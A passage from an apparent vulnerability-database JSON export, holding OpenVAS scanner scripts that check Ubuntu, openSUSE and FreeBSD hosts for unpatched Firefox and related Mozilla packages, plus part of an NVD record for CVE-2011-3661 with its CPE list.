USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"USN-1306-1 fixed vulnerabilities in Firefox. This update provides updated\n Mozvoikko and ubufox packages for use with Firefox 9.\n\n Original advisory details:\n Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler,\n David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia\n Knous, and Rober Longson discovered several memory safety issues which\n could possibly be exploited to crash Firefox or execute arbitrary code as\n the user that invoked Firefox. (CVE-2011-3660)\n\n Aki Helin discovered a crash in the YARR regular expression library that\n could be triggered by javascript in web content. (CVE-2011-3661)\n\n It was discovered that a flaw in the Mozilla SVG implementation could\n result in an out-of-bounds memory access if SVG elements were removed\n during a DOMAttrModified event handler. An attacker could potentially\n exploit this vulnerability to crash Firefox. (CVE-2011-3658)\n\n Mario Heiderich discovered it was possible to use SVG animation accessKey\n events to detect key strokes even when JavaScript was disabled. A malicious\n web page could potentially exploit this to trick a user into interacting\n with a prompt thinking it came from the browser in a context where the user\n believed scripting was disabled. (CVE-2011-3663)\n\n It was discovered that it was possible to crash Firefox when scaling an OGG\n <video> element to extreme sizes. (CVE-2011-3665)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1306-2\";\ntag_affected = \"mozvoikko on Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1306-2/\");\n script_id(840859);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 13:30:14 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1306-2\");\n script_cve_id(\"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3658\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_name(\"Ubuntu Update for mozvoikko USN-1306-2\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xul-ext-mozvoikko\", ver:\"1.10.0-0ubuntu0.11.04.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"xul-ext-ubufox\", ver:\"0.9.3-0ubuntu0.11.04.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:42:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:1361412562310850177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850177", "type": "openvas", "title": "openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2012:0039-2)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850177\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 20:16:05 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0039-2\");\n script_name(\"openSUSE: Security Advisory for MozillaFirefox (openSUSE-SU-2012:0039-2)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'MozillaFirefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n script_tag(name:\"affected\", value:\"MozillaFirefox on openSUSE 11.4\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox Version 9 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash\n in the YARR regular expression library\n\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n\n * MFSA 2011-56/CVE-2011-3663: Key detection without\n JavaScript via SVG animation\n\n * MFSA 2011-58/CVE-2011-3665: Crash scaling <video> to\n extreme sizes\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-buildsymbols\", rpm:\"MozillaFirefox-buildsymbols~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-devel\", rpm:\"MozillaFirefox-devel~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-common\", rpm:\"MozillaFirefox-translations-common~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations-other\", rpm:\"MozillaFirefox-translations-other~9.0~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-js192\", rpm:\"mozilla-js192~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192\", rpm:\"mozilla-xulrunner192~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-buildsymbols\", rpm:\"mozilla-xulrunner192-buildsymbols~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-devel\", rpm:\"mozilla-xulrunner192-devel~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-gnome\", rpm:\"mozilla-xulrunner192-gnome~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-translations-common\", rpm:\"mozilla-xulrunner192-translations-common~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-translations-other\", rpm:\"mozilla-xulrunner192-translations-other~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-js192-32bit\", rpm:\"mozilla-js192-32bit~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-32bit\", rpm:\"mozilla-xulrunner192-32bit~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-gnome-32bit\", rpm:\"mozilla-xulrunner192-gnome-32bit~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-translations-common-32bit\", rpm:\"mozilla-xulrunner192-translations-common-32bit~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-xulrunner192-translations-other-32bit\", rpm:\"mozilla-xulrunner192-translations-other-32bit~1.9.2.25~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-21T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70588", "href": "http://plugins.openvas.org/nasl.php?oid=70588", "type": "openvas", "title": "FreeBSD Ports: firefox", "sourceData": "#\n#VID e3ff776b-2ba6-11e1-93c6-0011856a6e37\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID e3ff776b-2ba6-11e1-93c6-0011856a6e37\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n firefox\n linux-firefox\n linux-seamonkey\n linux-thunderbird\n seamonkey\n thunderbird\n\nCVE-2011-3658\nThe SVG implementation in Mozilla Firefox 8.0, Thunderbird 8.0, and\nSeaMonkey 2.5 does not properly interact with DOMAttrModified event\nhandlers, which allows remote attackers to cause a denial of service\n(out-of-bounds memory access) or possibly have unspecified other\nimpact via vectors involving removal of SVG elements.\n\nCVE-2011-3660\nMultiple unspecified vulnerabilities in the browser engine in Mozilla\nFirefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey\nbefore 2.6 allow remote attackers to cause a denial of service (memory\ncorruption and application crash) or possibly execute arbitrary code\nvia vectors that trigger a compartment mismatch associated with the\nnsDOMMessageEvent::GetData function, and unknown other vectors.\n\nCVE-2011-3661\nYARR, as used in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0\nthrough 8.0, and SeaMonkey before 2.6, allows remote attackers to\ncause a denial of service (application crash) or possibly execute\narbitrary code via crafted JavaScript.\n\nCVE-2011-3663\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to capture keystrokes\nentered on a web page, even when JavaScript is disabled, by using SVG\nanimation accessKey events within that web page.\n\nCVE-2011-3665\nMozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and\nSeaMonkey before 2.6 allow remote attackers to cause a denial of\nservice (application crash) or possibly have unspecified other impact\nvia an Ogg VIDEO element that is not properly handled after scaling.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.mozilla.org/security/announce/2011/mfsa2011-53.html\nhttp://www.mozilla.org/security/announce/2011/mfsa2011-54.html\nhttp://www.mozilla.org/security/announce/2011/mfsa2011-55.html\nhttp://www.mozilla.org/security/announce/2011/mfsa2011-56.html\nhttp://www.mozilla.org/security/announce/2011/mfsa2011-58.html\nhttp://www.vuxml.org/freebsd/e3ff776b-2ba6-11e1-93c6-0011856a6e37.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70588);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-21 11:02:32 +0200 (Fri, 21 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_version(\"$Revision: 5999 $\");\n script_name(\"FreeBSD Ports: firefox\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0,1\")>0 && revcomp(a:bver, b:\"9.0,1\")<0) {\n txt += 'Package firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-firefox\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0,1\")<0) {\n txt += 'Package linux-firefox version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6\")<0) {\n txt += 'Package linux-seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"9.0\")<0) {\n txt += 'Package linux-thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"seamonkey\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6\")<0) {\n txt += 'Package seamonkey version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"thunderbird\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.0\")>0 && revcomp(a:bver, b:\"9.0\")<0) {\n txt += 'Package thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2020-12-09T19:39:11", "description": "YARR, as used in Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted JavaScript.", "edition": 5, "cvss3": {}, "published": "2011-12-21T04:02:00", "title": "CVE-2011-3661", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3661"], "modified": "2017-09-19T01:34:00", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:8.0", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:thunderbird:7.0", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:firefox:4.0.1", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:seamonkey:2.0.11", "cpe:/a:mozilla:firefox:5.0.1", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:7.0", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:4.0", "cpe:/a:mozilla:thunderbird:6.0.2", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:7.0.1", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:seamonkey:2.0.14", "cpe:/a:mozilla:seamonkey:2.5", "cpe:/a:mozilla:thunderbird:7.0.1", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.3.3", "cpe:/a:mozilla:firefox:6.0.2", "cpe:/a:mozilla:thunderbird:6.0", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:2.0.13", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:8.0", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:6.0", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:seamonkey:2.0.12", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:5.0", "cpe:/a:mozilla:seamonkey:2.0a1pre", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0a1", "cpe:/a:mozilla:thunderbird:5.0", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:2.0.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:2.1", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2011-3661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3661", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:seamonkey:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:beta:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.99:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:1.1.10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:alpha:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:dev:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1:*:pre:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta12:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:*:*:*:*:*:*:*", 